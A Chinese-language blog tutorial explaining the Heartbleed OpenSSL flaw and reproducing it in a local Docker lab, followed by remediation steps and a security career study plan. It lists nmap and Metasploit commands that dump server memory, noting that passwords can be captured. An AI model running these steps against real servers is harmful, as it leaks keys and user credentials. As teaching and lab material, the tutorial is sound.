OpenSSL 心脏滴血漏洞(CVE-2014-0160)漏洞讲解（小白可懂，简单详细）

最新推荐文章于 2024-06-10 09:55:41 发布

程序员负总裁

最新推荐文章于 2024-06-10 09:55:41 发布

阅读量1.5k

点赞数 14

文章标签：安全

本文链接：https://blog.csdn.net/Innocence_0/article/details/136410238

版权

本文详细解释了OpenSSLHeartbleed漏洞的原理，如何利用Nmap和MSF工具进行复现，以及修复方案，涉及从初级到高级网络安全工程师的学习路径。

摘要由CSDN通过智能技术生成

Heartbleed

心脏出血（英语：Heartbleed），也简称为心血漏洞，是一个出现在加密程序库OpenSSL的安全漏洞，该程序库广泛用于实现互联网的传输层安全（TLS）协议。它于2012年被引入了软件中，2014年4月首次向公众披露。只要使用的是存在缺陷的OpenSSL实例，无论是服务器还是客户端，都可能因此而受到攻击。此问题的原因是在实现TLS的心跳扩展时没有对输入进行适当验证（缺少边界检查），因此漏洞的名称来源于“心跳”（heartbeat）。该程序错误属于缓冲区过滤，即可以读取的数据比应该允许读取的还多。HeartBleed主要存在与OpenSSL的1.0.1版本到1.0.1f版本。利用该漏洞，攻击者可以远程读取服务器内存中64K的数据，获取内存中的敏感信息。

漏洞描述

Heartbleed漏洞，这项严重缺陷(CVE-2014-0160)的产生是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容，这样一来受害者的内存内容就会以每次64KB的速度进行泄露。

漏洞原理

OpenSSL“心脏出血”漏洞的问题出现在openSSL处理TLS心跳的过程中，TLS心跳的流程是：A向B发送请求包，B收到包后读取这个包的内容(data)，并返回一个包含有请求包内容的响应包。请求包的内容(data)中包含有包的类型(type)和数据长度等信息。
当B收到A的请求包后，并没有的验证A包的实际长度，而是简单的把请求包data中说明的长度当作data的实际长度，于是当请求包中说明的长度与请求包数据实际长度不同时，问题就产生了。假设A构造一个请求包，它的实际内容长度只有1，而却告诉B的它的长度是65535，那么B接受到这个包后就会把A的内容完全当作65535来处理，其实到这里，问题还并不严重，最严重的问题出在，心跳的响应包还需要附带请求包的全部内容，这就需要程序做一次将请求包的数据从它所在的内存拷贝到响应包的内存里的操作。
这下就出大问题了，当拷贝的时候，程序认为A包的内容长度是65535个字节，结果A包在内存里面实际只有1个字节，于是程序不仅拷贝出了A包的内容，还“傻傻”地将A包数据在内存中位置后额外的65534个字节拷贝进了响应包里，并将这个响应包发还给了A，于是A便轻易地获得了B内存中这65534个字节的数据。想象一下，如果这65534个字节数据中包括一些敏感信息，那么后果将非常严重。而且A还可以简单地通过连续的发送心跳包，获取B机器内存中n个65534字节的数据，这个漏洞不愧是2014年“最佳漏洞”。

影响版本

OpenSSL 1.0.1版本

漏洞复现

环境介绍

靶机：centos7 192.168.139.136
攻击机：kali 192.168.139.129
确保两台测试机网络能通

环境搭建

使用docker+vulhub搭建漏洞环境，在centos7上搭建vulhub的步骤如下：

安装docker依赖包

命令：yum install -y yum-utils device-mapper-persistent-data lvm2
在这里插入图片描述

安装docker

命令：yum install docker
在这里插入图片描述

启动docker（页面没有显示）

命令：systemctl start docker
![在这里插入图片描述](https://img-
blog.csdnimg.cn/7532e6549daf46fab1d6a9843c43f03f.png#pic_center)

centos7下安装git

命令：yum install -y git
在这里插入图片描述

下载vulhub

git clone +下载地址
命令：git clone https://github.com/vulhub/vulhub.git
在这里插入图片描述

找到CVE-2014-0160，并进入,输入命令docker-compose up -d运行漏洞环境

命令：ls #查看所有漏洞目录
在这里插入图片描述

命令：cd openssl #进入该目录
ls
在这里插入图片描述

命令：docker-compose up -d #运行漏洞环境
在这里插入图片描述

查看运行情况

命令：docker ps
在这里插入图片描述

复现过程

信息收集

使用Nmap进行扫描

命令：nmap -sV -T4 192.168.139.136
在这里插入图片描述

使用Nmap漏洞扫描脚本对8443端口进行扫描检测如下：

命令：nmap -sV -p 8443 --script ssl-heartbleed.nse 192.168.139.136
在这里插入图片描述

使用MSF框架攻击

进入msfconsole

命令：msfconsole
在这里插入图片描述

搜索相关漏洞模块

命令：search heartbleed
在这里插入图片描述

使用攻击模块1

命令：use auxiliary/scanner/ssl/openssl_heartbleed
![在这里插入图片描述](https://img-
blog.csdnimg.cn/00ea4a3ebe88484692aaa5e576d0503d.png#pic_center)

查看配置参数

命令：show options
在这里插入图片描述

配置参数

对required为yes但是current setting为空的项进行设置，这里我们只需要设置rhosts（靶机ip）
命令：set rhosts 192.168.139.136 #靶机ip
set rport 8443 #设置端口
set verbose true #设置verbose为true是为了看到泄露的信息![在这里插入图片描述](https://img-
blog.csdnimg.cn/9906ca9f750e442dacbc72be0c0aae5e.png)

进行攻击

命令：run
这里就可以看到靶机的64KB信息了（如果有人此时在登录web应用，还可以直接抓到账号密码等信息）。
在这里插入图片描述

在这里插入图片描述

修复方案

OpenSSL“心脏出血”漏洞（CVE-2014-0160）受影响的OpenSSL版本：
OpenSSL 1.0.2-beta
OpenSSL 1.0.1 - OpenSSL 1.0.1f
要解决此漏洞，简单粗暴的方法就是升级openSSL软件。
建议服务器管理员或使用1.0.1g版，或使用-
DOPENSSL_NO_HEARTBEATS选项重新编译OpenSSL，从而禁用易受攻击的功能，直至可以更新服务器软件。

1.将受影响的服务器下线，避免它继续泄露敏感信息。
2.停止旧版的 openssl 服务，升级 openssl 到新版本，并重新启动。
3.生成新密钥。（因为攻击者可能通过漏洞获取私钥。）将新密钥提交给你的CA，获得新的认证之后在服务器上安装新密钥。
4.服务器上线。
5.撤销旧认证。
6.撤销现有的会话cookies。
7.要求用户修改密码。
Heartbleed 是在 8 年多前被发现并修补的，然而许多服务器仍然存在 Heartbleed 漏洞

接下来我将给各位同学划分一张学习计划表！

学习计划

那么问题又来了，作为萌新小白，我应该先学什么，再学什么？
既然你都问的这么直白了，我就告诉你，零基础应该从什么开始学起：

阶段一：初级网络安全工程师

接下来我将给大家安排一个为期1个月的网络安全初级计划，当你学完后，你基本可以从事一份网络安全相关的工作，比如渗透测试、Web渗透、安全服务、安全分析等岗位；其中，如果你等保模块学的好，还可以从事等保工程师。

综合薪资区间6k~15k

1、网络安全理论知识（2天）
①了解行业相关背景，前景，确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。（非常重要）

2、渗透测试基础（1周）
①渗透测试的流程、分类、标准
②信息收集技术：主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察
④主机攻防演练：MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础（1周）
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全（系统入侵排查/系统加固基础）

4、计算机网络基础（1周）
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析（HTTP、TCP/IP、ARP等）
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御：主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作（2天）
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透（1周）
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具：Nmap、BurpSuite、SQLMap、其他（菜刀、漏扫等）

那么，到此为止，已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗？

阶段二：中级or高级网络安全工程师（看自己能力）

综合薪资区间15k~30k

7、脚本编程学习（4周）
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中，想要高效地使用自制的脚本工具来实现各种目的，更是需要拥有编程能力。

零基础入门的同学，我建议选择脚本语言Python/PHP/Go/Java中的一种，对常用库进行编程学习
搭建开发环境和选择IDE，PHP环境推荐Wamp和XAMPP，IDE强烈推荐Sublime；

Python编程学习，学习内容包含：语法、正则、文件、网络、多线程等常用库，推荐《Python核心编程》，没必要看完

用Python编写漏洞的exp,然后写一个简单的网络爬虫

PHP基本语法学习并书写一个简单的博客系统

熟悉MVC架构，并试着学习一个PHP框架或者Python框架 (可选)

了解Bootstrap的布局或者CSS。